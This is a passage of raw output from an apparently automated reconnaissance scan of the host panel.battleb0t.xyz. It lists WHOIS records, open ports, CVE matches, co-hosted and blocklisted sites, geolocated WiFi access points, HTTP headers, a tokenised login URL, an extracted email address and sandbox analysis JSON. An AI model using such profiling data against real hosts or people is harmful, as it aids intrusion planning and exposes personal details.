Name Server: NS1.CPHOSTINGWORLD.NET
Name Server: NS2.CPHOSTINGWORLD.NET
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@resellercamp.com
Registrar Abuse Contact Phone: +62.82141570000
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:34.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: AYSHU.XYZ
Registry Domain ID: D346635612-CNIC
Registrar WHOIS Server: whois.resellercamp.com
Registrar URL: http://resellercamp.com/
Updated Date: 2023-02-01T09:46:29Z
Creation Date: 2023-02-01T09:45:59Z
Registrar Registration Expiration Date: 2024-02-01T23:59:59Z
Registrar: CV. Jogjacamp
Registrar IANA ID: 1478
Registrar Abuse Contact Email: abuse@resellercamp.com
Registrar Abuse Contact Phone: +62.82141570000
Domain Status: clientTransferProhibited (http://icann.org/epp#clientTransferProhibited)
Registrant Organization: cP Hosting World
Registrant State/Province: Bagerhat
Registrant Country: BD
Name Server: ns1.cphostingworld.net
Name Server: ns2.cphostingworld.net
DNSSEC: Unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>>Last update of WHOIS database: 2023-05-12T03:02:34Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
Registration Service Provided By: RESELL CORE
The data in this whois database is provided to you for information purposes
only, that is, to assist you in obtaining information about or related to a
domain name registration record. We make this information available "as is",
and do not guarantee its accuracy. By submitting a whois query, you agree
that you will use this data only for lawful purposes and that, under no
circumstances will you use this data to:
(1) enable high volume, automated, electronic processes that stress or load
this whois database system providing you this information; or
(2) allow, enable, or otherwise support the transmission of mass unsolicited,
commercial advertising or solicitations via direct mail, electronic mail, or
by telephone.
The compilation, repackaging, dissemination or other use of this data is
expressly prohibited without prior written consent from us. The Registrar of
record is CV. Jogjacamp.
We reserve the right to modify these terms at any time.
By submitting this query, you agree to abide by these terms.
|
| 2023-05-12 02:54:22 | Linked URL - External | No | Web Spider | 0 | 0 | 4 | 0 | None | https://pbs.twimg.com/profile_images/1513617779546595336/ojFIrGXM_400x400.jpg | https://qolhub.cloudflareaccess.com/cdn-cgi/access/login/panel.battleb0t.xyz?kid=0e8fcd5c4d6f2fbb6bc18c164812f146f66e83d772c26262aaca860dfa7cb5c3&redirect_url=%2F&meta=eyJraWQiOiJlOTUxOWI4ZTZkZDg2N2Q4MGQwZTRiZWVhYjI5MjZlYjM3ZWJmYThhMWIxZjlmYmMwN2ExNjVkMGQ5YmEyZjFmIiwiYWxnIjoiUlMyNTYiLCJ0eXAiOiJKV1QifQ.eyJzZXJ2aWNlX3Rva2VuX3N0YXR1cyI6ZmFsc2UsImlhdCI6MTY4Mzg2MDA2Miwic2VydmljZV90b2tlbl9pZCI6IiIsImF1ZCI6IjBlOGZjZDVjNGQ2ZjJmYmI2YmMxOGMxNjQ4MTJmMTQ2ZjY2ZTgzZDc3MmMyNjI2MmFhY2E4NjBkZmE3Y2I1YzMiLCJob3N0bmFtZSI6InBhbmVsLmJhdHRsZWIwdC54eXoiLCJhcHBfc2Vzc2lvbl9oYXNoIjoiNGY3Yzk5OWY0YzQ5OTU5MTk1NTJkZGRhZTMxZjAzMTBmMjY5NzhlZmVkYTUzYWYyZDgxOGY1ZWVlNGVjYTI5MyIsIm5iZiI6MTY4Mzg2MDA2MiwiaXNfd2FycCI6ZmFsc2UsImlzX2dhdGV3YXkiOmZhbHNlLCJ0eXBlIjoibWV0YSIsInJlZGlyZWN0X3VybCI6IlwvIiwibXRsc19hdXRoIjp7ImNlcnRfaXNzdWVyX3NraSI6IiIsImNlcnRfcHJlc2VudGVkIjpmYWxzZSwiY2VydF9zZXJpYWwiOiIiLCJjZXJ0X2lzc3Vlcl9kbiI6IiIsImF1dGhfc3RhdHVzIjoiTk9ORSJ9LCJhdXRoX3N0YXR1cyI6Ik5PTkUifQ.nmLVBPo6h3yJ-eeLa1z8MJxup5DvHiZsxc_azrIBMDZkAuzXJXrBgg2dSJete3yFlMRnhoJH_s6r9en_PegF2VXgTcEejRV68gqMq3vN0gqcnLCjxJ7R_q2HnXYBEj1GnW4CnMF2ytqVCjGW9kOAsQf3EnRyTjMGNkhzWHc8cSXk-YZsczAFnsTwlEWEWf-Vtivai9PAOaJofIoE_LacgC5tzGLXINkdWAyouIP8rapadqait8eo8oF0pNIeRyyLHJRBoo5cXuRrs7jtBVREnw74sp6OKnYrw3iVG9BLCEN00TCsKQ0TApXWvZYkQfxCCgFAewQtUM8EIB0Sx1pQUg |
| 2023-05-12 02:54:17 | Open TCP Port | No | Censys | 0 | 0 | 4 | 0 | None | 2606:4700:3037::6815:470e:80 | 2606:4700:3037::6815:470e |
| 2023-05-12 03:23:27 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.9:8080 | 188.114.96.0/24 |
| 2023-05-12 03:12:12 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2016-6329
https://nvd.nist.gov/vuln/detail/CVE-2016-6329
Score: 5.9
Description: OpenVPN, when using a 64-bit block cipher, makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTP-over-OpenVPN session using Blowfish in CBC mode, aka a "Sweet32" attack. | 188.114.96.1 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-cache-status: MISS | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "MISS", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"909ebccb4059d7a6690e6424fe1cd04d\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=0Oz6%2FLYR6mlw4qLR9TqycfDZLMo35NVUiZYmytvsw3hnWwlYi3vXylGK8mcPxqptF5Q12B2z9i8IcSssMtY%2F8jZKTAZstXlLXIh5z%2FfUynzRd9ziD3olhhhTaQ1vvaqk6%2BxJd7oSs5Bg\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f60498977c3f0-EWR"} |
| 2023-05-12 03:03:51 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | ply.gg | 185.199.110.153 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wlan (Net ID: 00:01:71:0A:19:07) | 52.3759, 4.8975 |
| 2023-05-12 03:03:16 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 104.21.71.14 | panel.battleb0t.xyz |
| 2023-05-12 02:45:12 | Physical Location | No | ipapi.co | 0 | 0 | 2 | 0 | None | Toronto, Ontario, ON, Canada, CA | 2606:4700:3031::ac43:8709 |
| 2023-05-12 02:53:42 | Physical Location | No | Censys | 0 | 0 | 2 | 0 | None | San Francisco, California, 94107, United States, North America | 185.199.109.153 |
| 2023-05-12 03:01:00 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.104): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 0 | 0 | 3 | 0 | None | GitHub\, Inc. | C=US,ST=California,L=San Francisco,O=GitHub\, Inc.,CN=*.github.io |
| 2023-05-12 03:09:08 | Vulnerability - General | Yes | Tool - Retire.js | 0 | 1 | 4 | 0 | None | CVE-2019-8331
Score: Unknown
Description: Unknown | https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js |
| 2023-05-12 03:03:26 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0001vrn.github.io |
| 2023-05-12 02:55:01 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c5cc474dd9f2b1c-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 188.114.96.1 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | tsunami (Net ID: 00:0D:29:AC:D7:1D) | 32.8608, -79.9746 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 0 | 0 | 2 | 0 | None | REG.RU LLC | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
|
| 2023-05-12 03:01:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.43): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-cache-hits: 0 | {"content-length": "103646", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-63a06\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-ewr18167-EWR", "x-cache": "MISS", "x-github-request-id": "70D2:0CB6:1A723F4:28AE86F:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "4232179a2468cad7d8e788f0a4fe958396bfc091", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.050131,VS0,VE21", "server": "GitHub.com", "connection": "keep-alive", "content-type": "application/javascript; charset=utf-8"} |
| 2023-05-12 02:53:49 | Physical Location | No | Censys | 0 | 0 | 2 | 0 | None | San Francisco, California, 94107, United States, North America | 2606:50c0:8000::153 |
| 2023-05-12 02:55:11 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | exim exim 4.95 | 87.248.157.102 |
| 2023-05-12 03:08:51 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.125 | 34.148.97.127 |
| 2023-05-12 03:09:05 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.111 | 87.248.157.102 |
| 2023-05-12 03:35:10 | Malicious Co-Hosted Site | Yes | Comodo | 0 | 1 | 3 | 0 | None | Blocked by Comodo DNS [00ffcc.cn] | 00ffcc.cn |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | VGF-KonstablerWache (Net ID: 00:02:6F:84:5C:04) | 50.1188, 8.6843 |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 007-liang.github.io | 185.199.111.153 |
| 2023-05-12 03:12:14 | Affiliate - Domain Whois | No | Whois | 6 | 0 | 6 | 0 | None | Domain Name: 01def.io
Registry Domain ID: e5ba8be85003487fa75e094c9481d3b7-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://www.namecheap.com/
Updated Date: 2022-06-08T05:38:27Z
Creation Date: 2022-06-03T05:37:56Z
Registry Expiry Date: 2026-06-03T05:37:56Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Capital Region
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: IS
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:12:12Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Terms of Use: Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by Identity Digital or the Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. When using the Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data provided by Identity Digital can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Identity Digital Inc. and Registry Operator reserve the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Domain name: 01def.io
Registry Domain ID: e5ba8be85003487fa75e094c9481d3b7-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2022-06-03T05:37:56.70Z
Registrar Registration Expiration Date: 2026-06-03T05:37:56.70Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T00:12:14.09Z <<<
For more information on Whois status codes, please visit https://icann.org/epp | 01def.io |
| 2023-05-12 02:59:54 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | dave@bradshaw.net | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://financialcafe.net/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_cc0_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "IsoScope_cc0_IESQMMUTEX_0_519"\n "IsoScope_cc0_IESQMMUTEX_0_303"\n "IsoScope_cc0_ConnHashTable<3264>_HashTable_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_cc0_IESQMMUTEX_0_331"\n "IsoScope_cc0_IE_EarlyTabStart_0xdc4_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3264"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"52.24.76.118:443"\n "172.64.132.15:443"\n "104.16.87.20:443"\n "142.250.189.232:443"\n "65.8.158.69:443"\n "104.17.25.14:443"\n "185.199.110.153:443"\n "142.250.189.234:443"\n "142.250.191.67:443"\n "142.250.189.174:443"\n "184.27.80.18:443"\n "20.25.53.147:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"use.fontawesome.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* Copyright 2011-2021 Twitter, Inc." (Indicator: "twitter")\n "transportUrl:b,context:c},J(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+ke.ca+"&cx=c";Io()&&(f+="&sign="+ke.Td);var g=te||ve?Ho(b,f):void 0;g||(g=rl("https://","http://",ke.jd+f));di().destination[a]={state:1,context:c};Hb(g)}};function Jo(){if(Zh()){return!0}return!1};var Mo=new RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/),No={cl:["ecl"],customPixels:["nonGooglePixels"],ecl:["cl"],ehl:["hl"],hl:["ehl"],html:["customScripts","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],customScripts:["html","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],nonGooglePixels:[],nonGoogleScripts:["nonGooglePixels"],nonGoogleIframes:["nonGooglePixels"]},Oo={cl:["ecl"],customPixels:["customScripts","html"]," (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarFF3A.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarFD53.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabFF39.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabFF39.tmp]- [targetUID: 00000000-00003376]\n "CabFD52.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabFD52.tmp]- [targetUID: 00000000-00003376]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003376]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n 